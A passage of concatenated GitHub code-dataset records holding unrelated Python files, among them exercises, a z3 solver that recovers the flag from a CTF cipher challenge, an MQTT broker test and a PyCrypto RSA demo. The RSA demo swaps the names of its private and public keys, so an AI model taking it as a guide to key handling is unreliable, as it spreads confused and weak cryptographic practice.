Restaurant('сашими', 'японская')\r\nrestautant_2.describe_restaurant()\r\nrestautant_2.open_restaurant()\r\nrestautant_2.set_number_served(12)\r\nrestautant_2.read_number_served()\r\nrestautant_2.increment_number_served(3)\r\nrestautant_2.read_number_served()\r\nrestautant_2.set_number_served(9)\r\nrestautant_2.read_number_served()\r\nrestautant_2.increment_number_served(1)\r\nrestautant_2.read_number_served()","repo_name":"AlexProvatorov/python_crash_course","sub_path":"topic_9/ex_9.4.py","file_name":"ex_9.4.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18532791497","text":"\"\"\"\nWelcome. In this kata, you are asked to square every digit of a number and concatenate them.\n\nFor example, if we run 9119 through the function, 811181 will come out, because 92 is 81 and 12 is 1.\n\nNote: The function accepts an integer and returns an integer\n\"\"\"\n\n\ndef square_digits(num):\n \"\"\"\n Iterates through each digit\n Adds the square of each digit to the sum\n \"\"\"\n digits = str(num)\n squares = ''\n for digit in digits:\n squares += str(int(digit)**2)\n return int(squares)\n\n\ndef square_digits(num):\n \"\"\"\n Join the square to a string for each digit\n \"\"\"\n return int(''.join(str(int(n)**2) for n in str(num)))\n\n\nif __name__ == '__main__':\n print(square_digits(9119))\n","repo_name":"cbraissant/codewars","sub_path":"python/01_square_digits.py","file_name":"01_square_digits.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74213305474","text":"# Inspired from http://coding4streetcred.com/blog/post/Asymmetric-Encryption-Revisited-(in-PyCrypto)\n# PyCrypto docs available at https://www.dlitz.net/software/pycrypto/api/2.6/\nimport random\n\n# import MySQLdb\nimport pyqrcode\nfrom Crypto import Random\nimport string\n\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.PublicKey import RSA\nimport base64\nimport hashlib\n\n\n\n\ndef generate_keys():\n\t\t# RSA modulus length must be a multiple of 256 and >= 1024\n\t\tmodulus_length = 256*4 # use larger value in production\n\t\trandomnum=''.join(random.choice(string.hexdigits) for n in range(modulus_length))\n\t\tpublickey = RSA.generate(modulus_length, Random.new().read)\n\t\tprivatekey = publickey.publickey()\n\t\treturn privatekey, publickey\n\ndef encrypt_message(a_message , privatekey):\n\t\t# print(publickey.encrypt(\"Hello.\".encode('utf-8'), 32))\n\t\tencryptor = PKCS1_OAEP.new(privatekey)\n\t\tencrypted = encryptor.encrypt(a_message.encode('utf-8'))\n\t\t# encrypted_msg = privatekey.encrypt(a_message.encode('utf-8'), 32)[0]\n\t\tencoded_encrypted_msg = base64.b64encode(encrypted) # base64 encoded strings are database friendly\n\t\treturn encoded_encrypted_msg\n\n\n\ndef decrypt_message(encoded_encrypted_msg, publickey):\n\t\tdecoded_encrypted_msg = base64.b64decode(encoded_encrypted_msg)\n\n\n\t\t# print('okkkk')\n\t\t# print(decoded_encrypted_msg)\n\t\t# print('end')\n\t\tencryptor = PKCS1_OAEP.new(publickey)\n\t\tdecoded_decrypted_msg = encryptor.decrypt(decoded_encrypted_msg)\n\t\treturn decoded_decrypted_msg\n\n########## BEGIN ##########\n\n# a_message = \"The quick brown fox jumped over the lazy dog\"\n# privatekey , publickey = generate_keys()\n# encrypted_msg = encrypt_message(a_message , privatekey )\n# decrypted_msg = decrypt_message(encrypted_msg, publickey)\n#\n# print (\"%s - (%d)\" % (privatekey.exportKey() , len(privatekey.exportKey())))\n# print (\"%s - (%d)\" % (publickey.exportKey() , len(publickey.exportKey())))\n# print (\" Original content: %s - (%d)\" % (a_message, len(a_message)))\n# print (\"Encrypted message: %s - (%d)\" % (encrypted_msg, len(encrypted_msg)))\n# print (\"Decrypted message: %s - (%d)\" % (decrypted_msg, len(decrypted_msg)))\n\n\nprivatekey, publickey = generate_keys()\n# print(\"pub\" + str(privatekey.exportKey()))\nencrypted_msg = encrypt_message(\"hello\", privatekey)\n# print(\"ec\", str(encrypted_msg))\n# con=MySQLdb.connect(host='localhost',port=3308,user='root',passwd='root',db='uniqueid')\n# cmd=con.cursor()\n# print(publickey)\n# print(type(publickey))\nky=publickey.exportKey(\"PEM\")\npky=privatekey.exportKey(\"PEM\")\n\n\n\n# key = publickey[0]\n\n# pk = RSA.importKey(key)\n# print('pk--------------', pk)\ndecrypted_msg = decrypt_message(encrypted_msg, publickey)\n# print(\"decy msg\" , decrypted_msg)\n\nwith open (\"private.pem\", \"w\") as prv_file:\n\tprint(\"{}\".format(publickey.exportKey()), file=prv_file)\n","repo_name":"Jisphilip/securuty","sub_path":"project/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32700394794","text":"from citychat_server.cityform.fields import Field\n\n\nclass Form:\n def __init__(self, method=None, id_prefix=None, attributes=None):\n self.method = method\n self.id_prefix = id_prefix\n self.attributes = attributes or {}\n self.values = {k: None for k in self.fields.keys()}\n self.errors = {k: [] for k in self.fields.keys()}\n\n @property\n def _fields(self):\n return [\n (key, value)\n for key, value in self.__class__.__dict__.items()\n if isinstance(value, Field)\n ]\n\n @property\n def fields(self):\n return {field[0]: field[1] for field in self._fields}\n\n @property\n def placeholder_values(self):\n return {k: '' for k in self.values.keys()}\n\n @property\n def placeholder_errors(self):\n return {k: '' for k in self.errors.keys()}\n\n def populate(self, values):\n if isinstance(values, dict):\n for k, v in values.items():\n if k in self.values:\n self.values[k] = v\n\n def pre_filter(self):\n for k, f in self.fields.items():\n for p in f.pre_filters:\n self.values[k] = p(self.values[k])\n\n def post_filter(self):\n for k, f in self.fields.items():\n for p in f.post_filters:\n self.values[k] = p(self.values[k])\n\n def validate(self):\n valid = True\n self.pre_filter()\n\n for k, f in self.fields.items():\n for v in f.validators:\n errors = v.validate(label=f.label, value=self.values[k])\n\n if errors:\n valid = False\n self.errors[k] = errors\n\n if valid:\n self.post_filter()\n\n return valid\n\n def to_json(self):\n return {\n 'args': {\n 'method': self.method.lower(),\n 'id': self.id_prefix + 'Form',\n **self.attributes\n },\n 'fields': [\n (f[0], f[1].to_list(self.id_prefix, f[0]))\n for f in self._fields\n ],\n 'values': self.placeholder_values,\n 'errors': self.placeholder_errors\n }\n","repo_name":"Kamide/citychat","sub_path":"server/citychat_server/cityform/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2477378615","text":"#\n# @lc app=leetcode id=127 lang=python3\n#\n# [127] Word Ladder\n#\n\n# @lc code=start\nimport collections\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n dicts = collections.defaultdict(list)\n for word in wordList:\n for i in range(len(word)):\n dicts[word[:i] + '#' + word[i + 1:]].append(word)\n \n seen = set()\n queue = collections.deque([(beginWord, 1)])\n while queue:\n word, step = queue.popleft()\n if word == endWord: return step\n seen.add(word)\n for i in range(len(word)):\n for sibling in dicts[word[:i] + '#' + word[i + 1:]]:\n if sibling not in seen:\n queue.append((sibling, step + 1))\n return 0\n# @lc code=end","repo_name":"OhYoooo/Leetcode","sub_path":"python/8.Tree/bfs/127.word-ladder.py","file_name":"127.word-ladder.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38165939482","text":"\"\"\"\nGather possible decimal point\nMarket Forcats : https://coincap.io/assets/bitcoin\nApi Documentation : https://docs.coincap.io/\n\"\"\"\n\nimport requests\n\nimport json\n\n# url = \"http://api.coincap.io/v2/assets/bitcoin/history?interval=d1&start=1664323200000&end=1664928000000\"\nurl = \"http://api.coincap.io/v2/assets/bitcoin/history?interval=d1\"\n\npayload = {}\nheaders = {}\n\nresponse = requests.request(\"GET\", url, headers=headers, data=payload)\n\njson_data = json.loads(response.text.encode('utf8'))\n\"\"\"\nThe average of last 7 days, 25 days and 90 days price.\n\"\"\"\n\n\ndef all_data(json_data):\n price_list = []\n for price in json_data:\n price_list.append(int(float(price['priceUsd'])))\n print(price_list)\n return price_list\n\n\nprice_list = all_data(json_data['data'])\n\n\ndef day_data(price_list, days):\n for btc_price in range(days):\n # print(len(price_list))\n print(price_list[len(price_list)-1-btc_price])\n print(-1-btc_price)\n # print(btc_price)\n\n# day_data(price_list, 7)\n# day_data(price_list, 25)\nday_data(price_list, 90)\n","repo_name":"sushen/mathandmoremath","sub_path":"4. Decimal System/moving_average.py","file_name":"moving_average.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35448364225","text":"import re\n\n\n# regex\nregexs = {\n 1: re.compile(\"^Where is (\\w+)\\?$\"),\n 2: re.compile(\"^Where is the (\\w+)\\?$\"),\n 3: re.compile(\"^Where was ([\\w ]+) before the (\\w+)\\?$\"),\n 4.1: re.compile(\"^What is ([\\w ]+) (\\w+) of\\?$\"),\n 4.2: re.compile(\"^What is (\\w+) of the (\\w+)\\?$\"),\n 5.1: re.compile(\"^What did (\\w+) give to (\\w+)\\?$\"),\n 5.2: re.compile(\"^Who gave the (\\w+) to (\\w+)\\?$\"),\n 5.3: re.compile(\"^Who did (\\w+) give the (\\w+) to\\?$\"),\n 5.4: re.compile(\"^Who gave the (\\w+)\\?$\"),\n 5.5: re.compile(\"^Who received the (\\w+)\\?$\"),\n 6: re.compile(\"Is (\\w+) in the (\\w+)\\?$\"),\n 7: re.compile(\"^How many objects is (\\w+) carrying\\?$\"),\n 8: re.compile(\"^What is (\\w+) carrying\\?$\"),\n # 9: same as 6\n # 10: same as 6\n # 11: same as 1\n # 12: same as 1\n # 13: same as 13\n # 14: same as 3\n 15: re.compile(\"^What is (\\w+) afraid of\\?$\"),\n 16: re.compile(\"^What color is (\\w+)\\?$\"),\n 17: re.compile(\"^Is the ([\\w+ ]+) (below|above|to the left of|to the right of) the ([\\w ]+)\\?$\"),\n 18.1: re.compile(\"^Is the ([\\w ]+) (bigger|smaller) than the ([\\w ]+)\\?$\"),\n 18.2: re.compile(\"^Does the ([\\w ]+) fit in the ([\\w ]+)\\?$\"),\n 19: re.compile(\"^How do you go from the (\\w+) to the (\\w+)\\?$\"),\n 20.1: re.compile(\"^Where will (\\w+) go\\?$\"),\n 20.2: re.compile(\"^Why did (\\w+) go to the (\\w+)\\?$\"),\n 20.3: re.compile(\"^Why did (\\w+) get the (\\w+)\\?$\"),\n}\n\n\nclass C06(object):\n @staticmethod\n def format(containee, container, answer=None):\n if answer == \"yes\":\n return \"{} is in the {}.\".format(containee, container)\n elif answer == \"no\":\n return \"{} is not in the {}.\".format(containee, container)\n elif answer == \"maybe\":\n return \"{} is maybe in the {}.\".format(containee, container)\n raise Exception(\"Unrecognized answer: {}\".format(answer))\n\nclass C08(object):\n @staticmethod\n def format(subject, answer=None):\n if answer == \"nothing\":\n return \"{} is carrying nothing.\".format(subject)\n else:\n return \"{} is carrying the {answer}.\".format(subject, answer=answer)\n\n\nclass C18_1(object):\n @staticmethod\n def format(subject, adjective, object, answer=None):\n if answer == \"yes\":\n return \"The {} is {} than the {}.\".format(subject, adjective, object)\n elif answer == \"no\":\n return \"The {} is not {} than the {}.\".format(subject, adjective, object)\n raise Exception(\"Unrecognized answer: {}\".format(answer))\n\n\nclass C18_2(object):\n @staticmethod\n def format(subject, object, answer=None):\n if answer == \"yes\":\n return \"The {} fits in the {}.\".format(subject, object)\n elif answer == \"no\":\n return \"The {} does not fit in the {}.\".format(subject, object)\n raise Exception(\"Unrecognized answer: {}\".format(answer))\n\n\nout_strings = {\n 1: \"{0} is in the {answer}.\",\n 2: \"The {0} is in the {answer}.\",\n 3: \"The {0} is in the {answer}.\",\n 4.1: \"The {0} is {1} of the {answer}.\",\n 4.2: \"The {answer} is {0} of the {1}.\",\n 5.1: \"{0} gave the {answer} to {1}.\",\n 5.2: \"{answer} gave the {0} to {1}.\",\n 5.3: \"{0} gave the {1} to {answer}.\",\n 5.4: \"{0} gave the {answer}.\",\n 5.5: \"{answer} received the {0}.\",\n 6: C06,\n 7: \"{0} is carrying {answer} objects.\",\n 8: C08,\n # 9: same as 6\n # 10: same as 6\n # 11: same as 1\n # 12: same as 1\n # 13: same as 13\n # 14: same as 3\n 15: \"{0} is afraid of {answer}.\",\n 16: \"The color of {0} is {answer}.\",\n 17: \"The {0} is {1} the {2}.\",\n 18.1: C18_1,\n 18.2: C18_2,\n 19: \"You go {answer} from the {0} to the {1}.\",\n 20.1: \"{0} will go to the {answer}.\",\n 20.2: \"{0} went to the {1} because he is {answer}.\",\n 20.3: \"{0} got the {1} because he is {answer}.\"\n\n}\n\n\ndef apply(regex, string, question, answer):\n result = regex.match(question)\n if result:\n return string.format(*result.groups(), answer=answer).capitalize()\n return result\n\n\ndef qa2hypo(question, answer):\n question = question.lstrip().rstrip()\n answer = answer.lstrip().rstrip()\n for task, regex in regexs.items():\n string = out_strings[task]\n result = apply(regex, string, question, answer)\n if result:\n return result\n raise Exception(\"Unknown question format: {}\".format(question))\n\n\ndef main():\n question = \"Where is Mary?\"\n answer = \"office\"\n print(qa2hypo(question, answer))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"seominjoon/qrn","sub_path":"qa2hypo.py","file_name":"qa2hypo.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"61"} +{"seq_id":"9709101917","text":"import functools\nfrom PIL import Image\nfrom z3 import *\n\nkey = \"k3Y\"\nn = 256\n\ndef sox(n, d):\n\tx, y, t = 0, 0, d\n\tfor s in range(n - 1):\n\t\tu = 1 & t // 2\n\t\tv = 1 & t ^ u\n\t\tx, y = spin(2**s, x, y, u, v)\n\t\tx += 2**s * u\n\t\ty += 2**s * v\n\t\tt = t // 4\n\treturn x, y\n\ndef spin(n, x, y, u, v):\n\tif v == 0:\n\t\tif u == 1:\n\t\t\tx = n - 1 - x\n\t\t\ty = n - 1 - y\n\t\tx, y = y, x\n\treturn x, y\n\nimport pickle\n\nwith open(\"hilbert.json\", 'rb') as f:\n\ttable = pickle.load(f)\n\nbuf = [Int(f\"F_{i}\") for i in range(n**2)]\ndef encrypt(_, key, n):\n\t_msg = buf\n\t_key = [ord(_) for _ in key]\n\t\n\timg = Image.open(\"enc.png\")\n\timg = img.rotate(90)\n\tpix = img.load()\n\n\tactual_msg = [0 for _ in range(n**2)]\n\n\tfor (x, y), v in table.items():\n\t\tactual_msg[v] = pix[x, y][0] \n\n\tfor _ in range(len(key)):\n\t\tw = len(_key)\n\t\th = n**2 // w + 1\n\t\tarr = [[_msg[w*x + y] if w*x + y < n**2 else None for x in range(h)] for y in range(w)]\n\t\t_conf = sorted([(_key[i], i) for i in range(w)])\n\t\t_marshal = [arr[_conf[i][1]] for i in range(w)]\n\t\t_msg = functools.reduce(lambda a, r: a + _marshal[r], range(w), [])\n\t\t_msg = list(filter(lambda x: x is not None, _msg))\n\n\t\t_msg = [(_msg[_] + _key[_ % w]) % 256 for _ in range(n**2)]\n\n\t\t# new z3 solve\n\t\tsolver = Solver()\n\n\t\tfor sym, actual in zip(_msg, actual_msg):\n\t\t\tsolver.add(sym == actual)\n\t\t\n\t\tfor sym in buf:\n\t\t\tsolver.add(sym > 32)\n\t\t\tsolver.add(sym < 127)\n\t\n\treturn solver\n\t\t\t\t\nprint(\"BUILDING EQUATION\")\nsolver = encrypt(None, key, n)\n\nprint(\"SOLVING FOR SATISFYING FLAG\")\nif solver.check() == sat:\n\tm = solver.model()\n\tprint(''.join(chr(m[b].as_long()) for b in buf))","repo_name":"abhishekg999/CTFWriteups","sub_path":"CryptoCTF/Bertrand/src/sym.py","file_name":"sym.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33934101482","text":"#!/usr/bin/env python3\n\n# Test for issue 1322:\n\n## restart dimq\n#sudo systemctl restart dimq.service\n#\n## listen on topic1\n#dimq_sub -t \"topic1\"\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message1\"\n## message1 on topic1 is received as expected\n#\n## publish to topic2 without clean session\n## IMPORTANT: no subscription to this topic is present on broker!\n#dimq_pub -t \"topic2\" -q 2 -c --id \"foobar\" -m \"message2\"\n## this goes nowhere, as no subscriber present\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message3\"\n## message3 on topic1 IS NOT RECEIVED\n#\n## listen on topic2 \n#dimq_sub -t \"topic2\"\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message4\"\n## message2 on topic2 is received incorrectly\n#\n## publish to topic1 without clean session\n#dimq_pub -t \"topic1\" -q 2 -c --id \"foobar\" -m \"message5\"\n## message5 on topic1 is received as expected (message4 was dropped)\n\n\n\nfrom dimq_test_helper import *\n\ndef do_test(proto_ver):\n rc = 1\n keepalive = 60\n pub_connect_packet = dimq_test.gen_connect(\"pub\", keepalive=keepalive, clean_session=False, proto_ver=proto_ver, session_expiry=60)\n pub_connack1_packet = dimq_test.gen_connack(rc=0, proto_ver=proto_ver)\n pub_connack2_packet = dimq_test.gen_connack(rc=0, flags=1, proto_ver=proto_ver)\n\n sub1_connect_packet = dimq_test.gen_connect(\"sub1\", keepalive=keepalive, proto_ver=proto_ver)\n sub1_connack_packet = dimq_test.gen_connack(rc=0, proto_ver=proto_ver)\n\n sub2_connect_packet = dimq_test.gen_connect(\"sub2\", keepalive=keepalive, proto_ver=proto_ver)\n sub2_connack_packet = dimq_test.gen_connack(rc=0, proto_ver=proto_ver)\n\n mid = 1\n subscribe1_packet = dimq_test.gen_subscribe(mid, \"topic1\", 0, proto_ver=proto_ver)\n suback1_packet = dimq_test.gen_suback(mid, 0, proto_ver=proto_ver)\n\n mid = 1\n subscribe2_packet = dimq_test.gen_subscribe(mid, \"topic2\", 0, proto_ver=proto_ver)\n suback2_packet = dimq_test.gen_suback(mid, 0, proto_ver=proto_ver)\n\n # All publishes have the same mid\n mid = 1\n pubrec_packet = dimq_test.gen_pubrec(mid, proto_ver=proto_ver)\n pubrel_packet = dimq_test.gen_pubrel(mid, proto_ver=proto_ver)\n pubcomp_packet = dimq_test.gen_pubcomp(mid, proto_ver=proto_ver)\n\n publish1s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message1\", proto_ver=proto_ver)\n publish2s_packet = dimq_test.gen_publish(\"topic2\", qos=2, mid=mid, payload=\"message2\", proto_ver=proto_ver)\n publish3s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message3\", proto_ver=proto_ver)\n publish4s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message4\", proto_ver=proto_ver)\n publish5s_packet = dimq_test.gen_publish(\"topic1\", qos=2, mid=mid, payload=\"message5\", proto_ver=proto_ver)\n\n publish1r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message1\", proto_ver=proto_ver)\n publish2r_packet = dimq_test.gen_publish(\"topic2\", qos=0, payload=\"message2\", proto_ver=proto_ver)\n publish3r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message3\", proto_ver=proto_ver)\n publish4r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message4\", proto_ver=proto_ver)\n publish5r_packet = dimq_test.gen_publish(\"topic1\", qos=0, payload=\"message5\", proto_ver=proto_ver)\n\n port = dimq_test.get_port()\n broker = dimq_test.start_broker(filename=os.path.basename(__file__), port=port)\n\n try:\n sub1 = dimq_test.do_client_connect(sub1_connect_packet, sub1_connack_packet, timeout=10, port=port)\n dimq_test.do_send_receive(sub1, subscribe1_packet, suback1_packet, \"suback1\")\n\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack1_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish1s_packet, pubrec_packet, \"pubrec1\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp1\")\n pub.close()\n\n dimq_test.expect_packet(sub1, \"publish1\", publish1r_packet)\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish2s_packet, pubrec_packet, \"pubrec2\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp2\")\n pub.close()\n\n # We expect nothing on sub1\n dimq_test.do_ping(sub1, error_string=\"pingresp1\")\n\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish3s_packet, pubrec_packet, \"pubrec3\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp3\")\n pub.close()\n\n dimq_test.expect_packet(sub1, \"publish3\", publish3r_packet)\n sub2 = dimq_test.do_client_connect(sub2_connect_packet, sub2_connack_packet, timeout=10, port=port)\n dimq_test.do_send_receive(sub2, subscribe2_packet, suback2_packet, \"suback2\")\n\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish4s_packet, pubrec_packet, \"pubrec4\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp4\")\n pub.close()\n\n # We expect nothing on sub2\n dimq_test.do_ping(sub2, error_string=\"pingresp2\")\n \n dimq_test.expect_packet(sub1, \"publish4\", publish4r_packet)\n pub = dimq_test.do_client_connect(pub_connect_packet, pub_connack2_packet, timeout=10, port=port)\n dimq_test.do_send_receive(pub, publish5s_packet, pubrec_packet, \"pubrec5\")\n dimq_test.do_send_receive(pub, pubrel_packet, pubcomp_packet, \"pubcomp5\")\n pub.close()\n\n # We expect nothing on sub2\n dimq_test.do_ping(sub2, error_string=\"pingresp2\")\n \n dimq_test.expect_packet(sub1, \"publish5\", publish5r_packet)\n rc = 0\n\n sub2.close()\n sub1.close()\n except dimq_test.TestError:\n pass\n finally:\n broker.terminate()\n broker.wait()\n (stdo, stde) = broker.communicate()\n if rc:\n print(stde.decode('utf-8'))\n print(\"proto_ver=%d\" % (proto_ver))\n exit(rc)\n\n\ndo_test(proto_ver=4)\ndo_test(proto_ver=5)\nexit(0)\n","repo_name":"ahsefati/DimQ","sub_path":"test/broker/02-subpub-qos2-1322.py","file_name":"02-subpub-qos2-1322.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23415125418","text":"from pathlib import Path\n\nroot_dir = Path(__file__).parent.parent.resolve() # directory of source root\n\nCONFIG_PATH = root_dir / 'config' # config file with flags anf paths\n\nGRAPHS_DIR = root_dir / 'data' # root directory to store all graph data\nPICS_DIR = root_dir / 'pics' # directory to store pictures\nRESULT_DIR = root_dir / 'results' # directory to store pictures\nDATASET_DIR = root_dir / 'datasets' # directory to store generated datasets\nSTATISTIC_DIR = root_dir / 'statistic'\n\nLFR_DIR = root_dir / 'soft' / 'lfr' / 'benchmark' # path to LFR binaries\nSNAP_DIR = root_dir / 'soft' / 'snap' # path to LFR binaries\n\n# Should go before any cython imports. By calling here it is run once\nfrom setup import build_cython\nbuild_cython(root_dir, SNAP_DIR)\n","repo_name":"crawling-framework/crawling-framework.github.io","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13355633704","text":"#!/usr/bin/python\nimport sys\nimport os\nimport json\nimport subprocess\nimport time\nimport numpy as np\n\n\"\"\"\nThis script is written to extract the the time (ms) taken to perform the various operations in GLRM\nmodel iteration. You should not use this for anything else. Provide the absolute path to the data\nfile if it is not in the same directory as this script.\n\"\"\"\n\n# --------------------------------------------------------------------\n# Main program\n# --------------------------------------------------------------------\n\ng_test_root_dir = os.path.dirname(os.path.realpath(__file__)) # directory where we are running out code from\n\ng_initialXY = \"Time taken (ms) to initializeXY with\" # text of interest\ng_reguarlize_Y = \"Time taken (ms) to calculate regularize_y\"\ng_regularize_X_objective = \"Time taken (ms) to calculate regularize_x and calculate\"\ng_updateX = \"Time taken (ms) to updateX\"\ng_updateY = \"Time taken (ms) to updateY\"\ng_objective = \"Time taken (ms) to calculate new objective function value\"\ng_stepsize = \"Time taken (ms) to set the step size\"\ng_history = \"Time taken (ms) to history of run\"\n\n\ndef extractRunInto(javaLogText):\n \"\"\"\n This function will extract the various operation time for GLRM model building iterations.\n\n :param javaLogText:\n :return:\n \"\"\"\n global g_initialXY\n global g_reguarlize_Y\n global g_regularize_X_objective\n global g_updateX\n global g_updateY\n global g_objective\n global g_stepsize\n global g_history\n\n\n if os.path.isfile(javaLogText):\n\n run_result = dict()\n run_result[\"total time (ms)\"] = []\n run_result[\"initialXY (ms)\"] = []\n run_result[\"regularize Y (ms)\"] = []\n run_result[\"regularize X and objective (ms)\"] = []\n run_result[\"update X (ms)\"] = []\n run_result[\"update Y (ms)\"] = []\n run_result[\"objective (ms)\"] = []\n run_result[\"step size (ms)\"] = []\n run_result[\"update history (ms)\"] = []\n\n total_run_time = -1\n val = 0.0\n with open(javaLogText, 'r') as thefile: # go into tempfile and grab test run info\n for each_line in thefile:\n temp_string = each_line.split()\n\n if len(temp_string) > 0:\n val = temp_string[-1].replace('\\\\','')\n\n if g_initialXY in each_line: # start of a new file\n if total_run_time > 0: # update total run time\n run_result[\"total time (ms)\"].append(total_run_time)\n total_run_time = 0.0\n else:\n total_run_time = 0.0\n\n run_result[\"initialXY (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_reguarlize_Y in each_line:\n run_result[\"regularize Y (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_regularize_X_objective in each_line:\n run_result[\"regularize X and objective (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_updateX in each_line:\n run_result[\"update X (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_updateY in each_line:\n run_result[\"update Y (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_objective in each_line:\n run_result[\"objective (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_stepsize in each_line:\n run_result[\"step size (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n if g_history in each_line:\n run_result[\"update history (ms)\"].append(float(val))\n total_run_time = total_run_time+float(val)\n\n run_result[\"total time (ms)\"].append(total_run_time) # save the last one\n print(\"Run result summary: \\n {0}\".format(run_result))\n\n else:\n print(\"Cannot find your java log file. Nothing is done.\\n\")\n\n\ndef main(argv):\n \"\"\"\n Main program. Take user input, parse it and call other functions to execute the commands\n and extract run summary and store run result in json file\n\n @return: none\n \"\"\"\n global g_test_root_dir\n global g_temp_filename\n\n if len(argv) < 2:\n print(\"invoke this script as python extractGLRMRuntimeJavaLog.py javatextlog.\\n\")\n sys.exit(1)\n else: # we may be in business\n javaLogText = argv[1] # filename while java log is stored\n\n print(\"your java text is {0}\".format(javaLogText))\n extractRunInto(javaLogText)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"h2oai/h2o-3","sub_path":"scripts/extractGLRMRuntimeJavaLog.py","file_name":"extractGLRMRuntimeJavaLog.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"19861288408","text":"def minion_game(string):\n # your code goes here\n kevinWords = {}\n stuartWords = {}\n \n vowel='AEIOU'\n length=len(string)\n \n for outsideScan in range(length):\n startLetter=string[outsideScan]\n for insideScan in range(1,length+1-outsideScan):\n subWord=string[outsideScan:outsideScan+insideScan]\n print(subWord)\n \n count = 0\n pos = 0\n isFound=string.find(subWord,pos)\n while(isFound != -1):\n count = count + 1\n pos = isFound + 1\n isFound=string.find(subWord,pos)\n print(count)\n \n if subWord[0] in vowel:\n kevinWords[subWord] = count\n else:\n stuartWords[subWord] = count\n \n stuartCount=sum(stuartWords.values())\n kevinCount=sum(kevinWords.values())\n \n if stuartCount == kevinCount:\n print('Draw')\n elif stuartCount > kevinCount:\n print('Stuart',stuartCount)\n else:\n print('Kevin',kevinCount)\n\nif __name__ == '__main__':\n s = input('input:')\n minion_game(s)\n\n","repo_name":"compwizdave/hackerrank-python","sub_path":"challenges/minion_game.py","file_name":"minion_game.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4637260376","text":"import csv\r\nimport time\r\nimport logging\r\nimport configparser\r\nimport os\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.firefox.options import Options\r\n\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy import create_engine\r\nfrom db_declarative import Reference, ReferenceHasMarca, Marca, Modelo, AnoModelo, Base, Status\r\n\r\nfrom time import sleep\r\n\r\n\r\nUNVISITED = 1\r\nVISITED = 2\r\nERROR = 3\r\n\r\npath = os.getcwd()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('config.ini')\r\nMainDivName = config['DivVehicleDesc']['MainDivName']\r\nfilename = config['VehicleType']['filename']\r\nvehicle = config['VehicleType']['vehicle']\r\n\r\nclass PageValues:\r\n def __init__(self, marca, modelo, ano_modelo, preco):\r\n \"\"\"\r\n PageValues is started with values that will be saved in csv 